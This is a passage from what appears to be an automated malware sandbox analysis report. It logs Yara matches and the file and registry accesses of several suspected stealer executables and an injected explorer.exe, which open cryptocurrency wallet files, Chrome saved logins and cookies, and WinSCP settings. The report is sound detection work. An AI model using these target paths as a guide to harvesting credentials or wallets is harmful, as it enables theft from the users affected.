Source: Yara match File source: 00000001.00000000.345197591.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5487.exe PID: 1272, type: MEMORYSTR
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\default_wallethI
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: 5487.exe, 00000012.00000002.515243787.0000000002355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx_Desktop_Old
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.jsonxJ
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: 5487.exe, 00000012.00000002.515243787.0000000002355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.jsonxJ
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: 5487.exe, 00000012.00000002.515243787.0000000002355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: xodus\exodus.w
Source: 5487.exe, 00000012.00000002.515243787.0000000002355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\default_wallethI
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: 5487.exe, 00000012.00000002.515243787.0000000002355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: multidoge.wallet
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.jsonxJ
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: 37F1.exe, 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\5487.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: Yara match File source: 00000012.00000002.515243787.0000000002355000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5487.exe PID: 1272, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 12.2.37F1.exe.4a8b076.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.7290000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.7290000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f55530.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f56418.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4a8a18e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f56418.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.37F1.exe.2eb9e80.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.48d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f8cf50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.37F1.exe.4910000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.37F1.exe.2eb9e80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f8cf50.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70ee8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f55530.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4a8a18e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4a8b076.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.417269957.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.531865007.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.544624082.0000000004A4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.550663724.0000000007290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.542826089.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.426623227.0000000002EB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 37F1.exe PID: 1760, type: MEMORYSTR
Source: Yara match File source: 00000011.00000002.469185788.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 11.3.uucbfdt.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.700e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uucbfdt.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.gecbfdt.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.405E.exe.810e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.gecbfdt.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uucbfdt.710e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.405E.exe.820000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.405E.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.3.gecbfdt.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.700e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.356712809.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.505978851.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356833950.0000000000841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.504789684.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.475515508.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.403897156.0000000000820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.255442832.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443176510.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.505917720.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443497890.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.345197591.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5487.exe PID: 1272, type: MEMORYSTR